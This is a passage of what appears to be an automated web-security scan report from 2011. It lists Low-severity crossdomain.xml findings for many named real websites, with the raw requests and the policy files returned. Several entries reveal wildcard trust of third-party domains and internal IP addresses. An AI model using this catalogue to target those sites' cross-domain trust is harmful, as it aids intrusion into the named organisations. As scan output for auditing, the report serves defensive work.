domain="*.google.co.in" /> <allow-access-from domain="*.google.co.jp" /> <allow-access-from domain="*.google.co.kr" /> <allow-access-from domain="*.google.co.nz" /> <allow-access-from domain="*.google.co.sk" /> <allow-access-from domain="*.google.co.uk" /> <allow-access-from domain="*.google.co.ve" /> <allow-access-from domain="*.google.co.za" /> <allow-access-from domain="*.google.com.ar" /> <allow-access-from domain="*.google.com.au" /> <allow-access-from domain="*.google.com.br" /> <allow-access-from domain="*.google.com.gr" /> <allow-access-from domain="*.google.com.hk" /> <allow-access-from domain="*.google.com.ly" /> <allow-access-from domain="*.google.com.mx" /> <allow-access-from domain="*.google.com.my" /> <allow-access-from domain="*.google.com.pe" /> <allow-access-from domain="*.google.com.ph" /> <allow-access-from domain="*.google.com.pk" /> <allow-access-from domain="*.google.com.ru" /> <allow-access-from domain="*.google.com.sg" /> <allow-access-from domain="*.google.com.tr" /> <allow-access-from domain="*.google.com.tw" /> <allow-access-from domain="*.google.com.ua" /> <allow-access-from domain="*.google.com.vn" /> <allow-access-from domain="*.google.de" /> <allow-access-from domain="*.google.dk" /> <allow-access-from domain="*.google.es" /> <allow-access-from domain="*.google.fi" /> <allow-access-from domain="*.google.fr" /> <allow-access-from domain="*.google.it" /> <allow-access-from domain="*.google.lt" /> <allow-access-from domain="*.google.lv" /> <allow-access-from domain="*.google.nl" /> <allow-access-from domain="*.google.no" /> <allow-access-from domain="*.google.pl" /> <allow-access-from domain="*.google.pt" /> <allow-access-from domain="*.google.ro" /> <allow-access-from domain="*.google.se" /> <allow-access-from domain="*.youtube.com" /> <allow-access-from domain="*.ytimg.com" /> <allow-access-from domain="*.2mdn.net" /> <allow-access-from domain="*.doubleclick.net" /> <allow-access-from domain="*.doubleclick.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://pagead2.googl |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: pagead2.googlesyndication |
HTTP/1.0 200 OK P3P: policyref="http://www Content-Type: text/x-cross-domain Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT Date: Sat, 02 Apr 2011 11:34:36 GMT Expires: Sun, 03 Apr 2011 11:34:36 GMT X-Content-Type-Options: nosniff Server: cafe X-XSS-Protection: 1; mode=block Age: 4982 Cache-Control: public, max-age=86400 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="maps.gstatic.com" /> <allow-access-from domain="maps.gstatic.cn" /> <allow-access-from domain="*.googlesyndication.com" /> <allow-access-from domain="*.google.com" /> <allow-access-from domain="*.google.ae" /> <allow-access-from domain="*.google.at" /> <allow-access-from domain="*.google.be" /> <allow-access-from domain="*.google.ca" /> <allow-access-from domain="*.google.ch" /> <allow-access-from domain="*.google.cn" /> <allow-access-from domain="*.google.co.il" /> <allow-access-from domain="*.google.co.in" /> <allow-access-from domain="*.google.co.jp" /> <allow-access-from domain="*.google.co.kr" /> <allow-access-from domain="*.google.co.nz" /> <allow-access-from domain="*.google.co.sk" /> <allow-access-from domain="*.google.co.uk" /> <allow-access-from domain="*.google.co.ve" /> <allow-access-from domain="*.google.co.za" /> <allow-access-from domain="*.google.com.ar" /> <allow-access-from domain="*.google.com.au" /> <allow-access-from domain="*.google.com.br" /> <allow-access-from domain="*.google.com.gr" /> <allow-access-from domain="*.google.com.hk" /> <allow-access-from domain="*.google.com.ly" /> <allow-access-from domain="*.google.com.mx" /> <allow-access-from domain="*.google.com.my" /> <allow-access-from domain="*.google.com.pe" /> <allow-access-from domain="*.google.com.ph" /> <allow-access-from domain="*.google.com.pk" /> <allow-access-from domain="*.google.com.ru" /> <allow-access-from domain="*.google.com.sg" /> <allow-access-from domain="*.google.com.tr" /> <allow-access-from domain="*.google.com.tw" /> <allow-access-from domain="*.google.com.ua" /> <allow-access-from domain="*.google.com.vn" /> <allow-access-from domain="*.google.de" /> <allow-access-from domain="*.google.dk" /> <allow-access-from domain="*.google.es" /> <allow-access-from domain="*.google.fi" /> <allow-access-from domain="*.google.fr" /> <allow-access-from domain="*.google.it" /> <allow-access-from domain="*.google.lt" /> <allow-access-from domain="*.google.lv" /> <allow-access-from domain="*.google.nl" /> <allow-access-from domain="*.google.no" /> <allow-access-from domain="*.google.pl" /> <allow-access-from domain="*.google.pt" /> <allow-access-from domain="*.google.ro" /> <allow-access-from domain="*.google.se" /> <allow-access-from domain="*.youtube.com" /> <allow-access-from domain="*.ytimg.com" /> <allow-access-from domain="*.2mdn.net" /> <allow-access-from domain="*.doubleclick.net" /> <allow-access-from domain="*.doubleclick.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.123greetings |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.123greetings.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:33:21 GMT Expires: Sat, 02 Apr 2011 13:41:34 GMT Last-Modified: Thu, 25 Jun 2009 06:57:01 GMT Cache-Control: max-age=900 Content-Type: text/xml ETag: "136-bb09a940" Accept-Ranges: bytes Server: Apache/2.2.3 (CentOS) Content-Length: 310 Connection: close <?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.123greetings.com" /> <allow-access-from domain="*.123g.us" /> <allow-access-from domain="192.168.0.61" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.4shared.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.4shared.com |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: hostid=345229067; Expires=Tue, 30-Mar-2021 13:24:10 GMT; Path=/ Content-Type: text/xml Date: Sat, 02 Apr 2011 13:24:09 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.4shared.com" /> <allow-access-from domain="*.4shared-china.com" /> <allow-access-from domain="*.4s.io" /> <allow-access-from domain="*.rumusic.org" /> <allow-access-from domain="*.19de9e7959fdb97632 ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.4tubemate.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.4tubemate.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 14:14:32 GMT Server: Apache Last-Modified: Wed, 03 Mar 2010 19:12:09 GMT Accept-Ranges: bytes Content-Length: 218 P3P: policyref="http://www Connection: close Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.naiadsystems.com" /> </cros ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.6pm.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.6pm.com |
HTTP/1.0 200 OK Server: nginx/0.9.4 Content-Type: application/xml Last-Modified: Fri, 25 Mar 2011 20:56:09 GMT Content-Length: 236 X-UUID: 61f40e6e-588e-11e0-82a7 Date: Sat, 02 Apr 2011 14:06:07 GMT Connection: close <?xml version="1.0"?><cross ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.acehardware |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.acehardware.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 14:06:39 GMT Server: Apache/2.0.63 (Unix) Last-Modified: Thu, 14 Oct 2010 08:47:00 GMT ETag: "4e411c-2ba-4928fc0d4e900 Accept-Ranges: bytes Content-Length: 698 Cache-Control: max-age=172800 Expires: Mon, 04 Apr 2011 14:06:39 GMT Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="www.acehardware ...[SNIP]... <allow-access-from domain="ace.imageg.net" /> <allow-access-from domain="*.gspt.net" /> <allow-access-from domain="*.gsipartners.com" /> <allow-access-from domain="preview.gsipartners.com" /> <allow-access-from domain="172.20.1.195" /> <allow-access-from domain="172.21.1.195" /> <allow-access-from domain="206.16.220.195" /> <allow-access-from domain="63.240.110.195" /> <allow-access-from domain="*.fetchback.com"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.adobe.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.adobe.com |
HTTP/1.1 200 OK Server: Apache Last-Modified: Wed, 12 Jan 2011 18:55:31 GMT ETag: "144-bec64ec0" Accept-Ranges: bytes Cache-Control: max-age=21600 Expires: Fri, 01 Apr 2011 12:39:00 GMT Keep-Alive: timeout=5, max=492 Content-Type: text/x-cross-domain Connection: close Date: Sat, 02 Apr 2011 12:37:36 GMT Age: 386 Content-Length: 324 <?xml version="1.0"?> <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*.macromedia.com" /> <allow-access-from domain="*.adobe.com" /> <allow-access-from domain="*.photoshop.com" /> <allow-access-from domain="*.acrobat.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.ae.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.ae.com |
HTTP/1.0 200 OK Server: Apache Last-Modified: Wed, 24 Feb 2010 11:38:20 GMT ETag: "276-480571a624300" Accept-Ranges: bytes Content-Length: 630 Content-Type: application/xml Date: Sat, 02 Apr 2011 13:31:35 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.ae.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.aezone.com" to-ports="80,82" secure="false"/> ...[SNIP]... <allow-access-from domain="testvipd5.scene7.com" secure="false"/> ...[SNIP]... <allow-access-from domain="a248.e.akamai.net ...[SNIP]... <allow-access-from domain="10.96.103.13" to-ports="80,82" secure="false"/> ...[SNIP]... <allow-access-from domain="10.100.108.20" to-ports="80,82" secure="false"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.aeropostale |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.aeropostale.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:39:09 GMT Server: Apache/2.0.63 (Unix) Last-Modified: Thu, 22 Jul 2010 08:45:04 GMT ETag: "4fc0bd-233-48bf5ef3f6400 Accept-Ranges: bytes Content-Length: 563 Cache-Control: max-age=172800 Expires: Mon, 04 Apr 2011 13:39:09 GMT Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: application/xml <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="www.aeropostale <allow-access-from domain="aero.imageg.net" /> <allow-access-from domain="*.gsipartners.com" secure="true" /> ...[SNIP]... <allow-access-from domain="www.ps4u.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.gspt.net" secure="true" /> ...[SNIP]... <allow-access-from domain="63.240.110.143" /> <allow-access-from domain="206.16.220.143" /> <allow-access-from domain="172.20.1.143" /> <allow-access-from domain="172.21.1.143" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.allbusiness |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.allbusiness.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:37:41 GMT Server: Apache Last-Modified: Fri, 01 Oct 2010 01:06:57 GMT ETag: "82" Accept-Ranges: bytes Content-Length: 130 Vary: Accept-Encoding Connection: close Content-Type: text/xml <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="*.brightcove.com" secure="false"/> </cross-domain-policy> |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.allposters.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.allposters.com |
HTTP/1.0 200 OK Cteonnt-Length: 590 Content-Type: text/xml Last-Modified: Thu, 26 Feb 2009 18:46:14 GMT ETag: "" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Cache-Control: private Date: Sat, 02 Apr 2011 13:31:48 GMT Content-Length: 590 Connection: close Set-Cookie: TLTSID=CF9AA2DC4CDDA Set-Cookie: TLTUID=CF9AA2DC4CDDA Set-Cookie: NSC_xxx_bqd=ffffffff ...<?xml version="1.0"? encoding="utf-8"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-doma ...[SNIP]... <allow-access-from domain="*.allposters.com"/> <allow-access-from domain="*.allposters.co.uk"/> <allow-access-from domain="*.art.com"/> <allow-access-from domain="*.art.co.uk"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.allrecipes.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.allrecipes.com |
HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 218 Content-Type: text/xml Last-Modified: Thu, 18 Jan 2007 23:00:58 GMT Accept-Ranges: bytes ETag: "6af14e84543bc71:1386" Server: Microsoft-IIS/6.0 X-Powered-By: WEB205 Date: Sat, 02 Apr 2011 13:25:16 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.allrecipes.com" /> </cr ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.altavista.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.altavista.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:58:54 GMT P3P: policyref="http://p3p Last-Modified: Fri, 04 Aug 2006 08:27:42 GMT Accept-Ranges: bytes Content-Length: 228 Connection: close Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.yahoo.com" secure="false" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.amazon.co.uk |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.amazon.co.uk |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:43:07 GMT Server: Server Last-Modified: Tue, 09 Nov 2010 18:03:08 GMT ETag: "3e0-8d97ef00" Accept-Ranges: bytes Content-Length: 992 Vary: Accept-Encoding,User Cneonction: close Content-Type: text/xml Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.amazon.com" /> <allow ...[SNIP]... <allow-access-from domain="anon.amazon.speedera.net" /> <allow-access-from domain="*.images-amazon.com" /> <allow-access-from domain="*.ssl-images-amazon.com" /> <allow-access-from domain="*.amazon.ca" /> <allow-access-from domain="*.amazon.cn" /> <allow-access-from domain="*.amazon.de" /> <allow-access-from domain="*.amazon.fr" /> <allow-access-from domain="*.amazon.it" /> <allow-access-from domain="*.amazon.jp" /> <allow-access-from domain="*.amazon.co.jp" /> <allow-access-from domain="*.amazon.uk" /> <allow-access-from domain="*.amazon.co.uk" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.americang |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.americangreetings.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 14:16:50 GMT Server: Apache Last-Modified: Mon, 17 May 2010 17:14:32 GMT ETag: "849ae-19f-5bb74e00" Accept-Ranges: bytes Content-Length: 415 Content-Type: text/xml Vary: Accept-Encoding Connection: close Set-Cookie: lbsegment=95;path=/ <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*.beta.americangreetings <allow-access-from domain="*.americangreetings.com" /> <allow-access-from domain="*.imgag.com" secure="false" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.aolnews.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.aolnews.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:44:20 GMT Server: Apache/2.2 Accept-Ranges: bytes Content-Length: 2128 Keep-Alive: timeout=5, max=999945 Connection: Keep-Alive Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.aol.com" /> <allow-access-from domain="*.aolcdn.com" /> <allow-access-from domain="*.channel.aol.com" /> <allow-access-from domain="*.channels.aol.com" /> <allow-access-from domain="*.digitalcity.com" /> <allow-access-from domain="*.digitas.com" /> <allow-access-from domain="*.facebook.com" /> <allow-access-from domain="*.my.aol.com" /> <allow-access-from domain="*.news.aol.com" /> <allow-access-from domain="*.office.aol.com" /> <allow-access-from domain="*.opticalcortex.com" /> <allow-access-from domain="*.pointroll.com" /> <allow-access-from domain="*.pointroll.net" /> <allow-access-from domain="*.popeater.com" /> <allow-access-from domain="*.publishing.aol.com" /> <allow-access-from domain="*.rewind.com" /> <allow-access-from domain="*.spinner.com" /> <allow-access-from domain="*.stats.com" /> <allow-access-from domain="*.theboombox.com" /> <allow-access-from domain="*.tmz.com" /> <allow-access-from domain="*.unicast.com" /> <allow-access-from domain="*.video.aol.com" /> <allow-access-from domain="*.video.office.aol.com" /> <allow-access-from domain="*.web.aol.com" /> <allow-access-from domain="*.yourminis.com" /> <allow-access-from domain="aimcreate.mdat.aim.com <allow-access-from domain="cdn-startpage.aol.com" /> <allow-access-from domain="cdn.digitalcity.com" /> <allow-access-from domain="channelevents.aol.com" /> <allow-access-from domain="channelevents.estage.aol <allow-access-from domain="goldrush.aol.com" to-ports="80" /> ...[SNIP]... <allow-access-from domain="iamalpha.com" /> <allow-access-from domain="imakealpha.com" /> <allow-access-from domain="progressive.stream.aol <allow-access-from domain="publishing.aol.com" /> <allow-access-from domain="stage.goldrush.aol.com" to-ports="80" /> ...[SNIP]... <allow-access-from domain="startpage.aol.com" /> <allow-access-from domain="static.stats.com" /> <allow-access-from domain="tmz.warnerbros.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.apple.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.apple.com |
HTTP/1.0 200 OK Last-Modified: Thu, 02 Jun 2005 16:16:28 GMT ETag: "8d-3f8918f48ef00" Server: Apache/2.2.14 (Unix) X-N: S Content-Type: application/xml Content-Length: 141 Cache-Control: max-age=313 Expires: Sat, 02 Apr 2011 12:48:03 GMT Date: Sat, 02 Apr 2011 12:42:50 GMT Connection: close <cross-domain-policy> <allow-access-from domain="wdirect.apple.com" /> <allow-access-from domain="*.apple.com" /> </cross-domain-policy> |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.associate |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.associatedcontent.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 12:38:13 GMT P3P: policyref="http://p3p Last-Modified: Fri, 25 Mar 2011 15:20:15 GMT Accept-Ranges: bytes Content-Length: 799 Vary: Accept-Encoding Connection: close Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <allow-access-from domain="*.associatedcontent.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.yahoo.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.acdn.us" secure="false"/> ...[SNIP]... <allow-access-from domain="*.doubleclick.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.2mdn.net" secure="false"/> ...[SNIP]... <allow-access-from domain="*.adinterax.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.eyewonder.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.eyewonderlabs.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.joystickinteractive.com" secure="false"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.astrology.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.astrology.com |
HTTP/1.0 200 OK Server: Apache Content-Type: text/xml Last-Modified: Wed, 30 Mar 2011 21:10:14 GMT Cache-Control: max-age=3562 Expires: Sat, 02 Apr 2011 14:45:07 GMT Date: Sat, 02 Apr 2011 13:45:45 GMT Content-Length: 305 Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.nbcuni.com" /> <allow-access-from domain="*.ivillage.com" /> <allow-access-from domain="*.clearspring.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.att.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.att.com |
HTTP/1.0 200 OK Server: Apache Last-Modified: Tue, 05 Oct 2010 20:19:38 GMT ETag: "19b-491e4614f4a80" Accept-Ranges: bytes Content-Length: 411 Content-Type: application/xml Date: Sat, 02 Apr 2011 12:37:47 GMT Connection: close Set-Cookie: TLTHID=03E218A65D261 Set-Cookie: TLTSID=03E218A65D261 Set-Cookie: TLTUID=03E218A65D261 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*.att.com"/> <allow-access-from domain="*.cingular.com"/> <allow-access-from domain="*.cingular.net"/> <allow-access-from domain="seattle.razorfishtc.com"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.azcentral.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.azcentral.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:35:13 GMT Server: Apache Last-Modified: Mon, 05 Oct 2009 16:44:19 GMT Accept-Ranges: bytes Content-Length: 289 Vary: Accept-Encoding,User P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM", policyref="/w3c/p3p.xml" Connection: close Content-Type: application/xml <cross-domain-policy xmlns:xsi="http://www.w3 xsi:noNamespaceSchem <allow-access-from domain="admin.brightcove.com"/> <allow-access-from domain="*.azcentral.com"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.babiesrus.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.babiesrus.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:27:39 GMT Server: Apache/2.0.63 (Unix) Vary: Host,Accept-Encoding Last-Modified: Thu, 22 Jul 2010 08:45:04 GMT ETag: "540db5-39b-48bf5ef3f6400 Accept-Ranges: bytes Content-Length: 923 Cache-Control: max-age=172800 Expires: Mon, 04 Apr 2011 13:27:39 GMT X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: application/xml <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="www.toysrus.com" /> <allow-access-from domain="www.babiesrus.com <allow-access-from domain="trus.imageg.net" /> <allow-access-from domain="*.gsipartners.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.gspt.net" secure="true" /> ...[SNIP]... <allow-access-from domain="63.240.110.201" /> <allow-access-from domain="206.16.220.201" /> <allow-access-from domain="172.20.1.201" /> <allow-access-from domain="172.21.1.201" /> <allow-access-from domain="vqascweb1.crossmedia ...[SNIP]... <allow-access-from domain="vqascweb2.crossmedia ...[SNIP]... <allow-access-from domain="toysrus.shoplocal.com" secure="true" /> ...[SNIP]... <allow-access-from domain="beta.crossmediaservices ...[SNIP]... <allow-access-from domain="*.fetchback.com"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.babycenter.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.babycenter.com |
HTTP/1.0 200 OK Server: Apache ETag: W/"225-1300928296000" Last-Modified: Thu, 24 Mar 2011 00:58:16 GMT Content-Length: 225 Content-Type: text/xml Cache-Control: private, no-cache, must-revalidate, proxy-revalidate Expires: Sat, 02 Apr 2011 13:25:44 GMT Date: Sat, 02 Apr 2011 13:25:44 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <allow-access-from domain="*.babycenter.com" secure="false" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.barackobama |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.barackobama.com |
HTTP/1.1 200 OK Cache-Control: max-age=3600 Content-Length: 364 Content-Type: text/xml ETag: "124389-16c-461ae1cf71040 Expires: Sat, 02 Apr 2011 14:41:57 GMT Last-Modified: Fri, 30 Jan 2009 07:25:45 GMT Accept-Ranges: bytes Server: Apache Date: Sat, 02 Apr 2011 13:41:57 GMT Connection: close <?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.barbie.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.barbie.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 12:54:36 GMT Server: MII-WSD/1.4 Content-Type: text/xml Last-Modified: Tue, 24 Jun 2008 17:49:48 GMT Accept-Ranges: bytes ETag: "467218b222d6c81:3f6" X-Powered-By: ASP.NET Age: 3090 Via: HTTP/1.1 www.barbie.com (MII-WSD/1.4) x-Message1: Powered by Mirror Image Internet Expires: Sat, 02 Apr 2011 15:54:36 GMT Cache-Control: max-age=10800 Via: 1.0 mdw107008 (MII-APC/1.6) Content-Length: 506 Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.everythinggirl.com" /> <allow-access-from domain="*.mattel.net" /> <allow-access-from domain="stageeverythinggirl <allow-access-from domain="*.eshq.mattel.com" /> <allow-access-from domain="*.corp.mattel.com" /> <allow-access-from domain="www.everythinggirl.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.barnesandnoble |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.barnesandnoble.com |
HTTP/1.0 200 OK Cache-Control: max-age=86400 Content-Length: 128 Content-Type: text/xml Last-Modified: Tue, 11 Sep 2007 16:08:18 GMT Accept-Ranges: bytes ETag: "054ef78df4c71:479" Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR ADM DEV TAI PSA IVDo CONo HIS TELo DEL SAMo UNRo LEG PRE" X-Powered-By: ASP.NET Date: Sat, 02 Apr 2011 13:25:14 GMT Connection: close Set-Cookie: datacenter=nj;path=/ <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="*.barnesandnoble.com" /> </cross-domain-policy> |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.bathandbo |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.bathandbodyworks.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 14:05:44 GMT Server: Apache/2.0.63 (Unix) Last-Modified: Wed, 02 Mar 2011 09:16:11 GMT ETag: "a7d5b4-2fc-49d7c5d242cc0 Accept-Ranges: bytes Content-Length: 764 Cache-Control: max-age=172800 Expires: Mon, 04 Apr 2011 14:05:44 GMT Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="www.bbw.com" /> <allow-access-from domain="bbw.com" /> ...[SNIP]... <allow-access-from domain="reviews.bathandbodyworks <allow-access-from domain="bathandbodyworks.com" /> <allow-access-from domain="bbw.imageg.net" /> <allow-access-from domain="bbw.cat.imageg.net" /> <allow-access-from domain="*.gsipartners.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.gspt.net" secure="true" /> ...[SNIP]... <allow-access-from domain="bbw.sec.imageg.net" /> <allow-access-from domain="*.fetchback.com"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.bbc.co.uk |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.bbc.co.uk |
HTTP/1.1 200 OK Server: Apache Content-Type: text/xml Date: Sat, 02 Apr 2011 12:43:24 GMT Keep-Alive: timeout=4, max=200 Accept-Ranges: bytes Connection: close Last-Modified: Thu, 13 May 2010 10:26:51 GMT Content-Length: 1216 <?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="downloads.bbc.co.uk" /> ...[SNIP]... <allow-access-from domain="news.bbc.co.uk" /> <allow-access-from domain="newsimg.bbc.co.uk"/> <allow-access-from domain="nolpreview11.newsonline <allow-access-from domain="newsrss.bbc.co.uk" /> <allow-access-from domain="newsapi.bbc.co.uk" /> <allow-access-from domain="extdev.bbc.co.uk" /> <allow-access-from domain="stats.bbc.co.uk" /> <allow-access-from domain="*.bbc.co.uk" /> <allow-access-from domain="*.bbc.net.uk" /> <allow-access-from domain="*.bbc.com" /> <allow-access-from domain="*.bbcamerica.com" /> <allow-access-from domain="www.bbcamerica.com" /> <allow-access-from domain="*.bbcimg.co.uk" /> <allow-access-from domain="node1.bbcimg.co.uk" /> <allow-access-from domain="node2.bbcimg.co.uk" /> <allow-access-from domain="node3.bbcimg.co.uk" /> <allow-access-from domain="node4.bbcimg.co.uk" /> <allow-access-from domain="news.bbcimg.co.uk" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.bettycrocker |
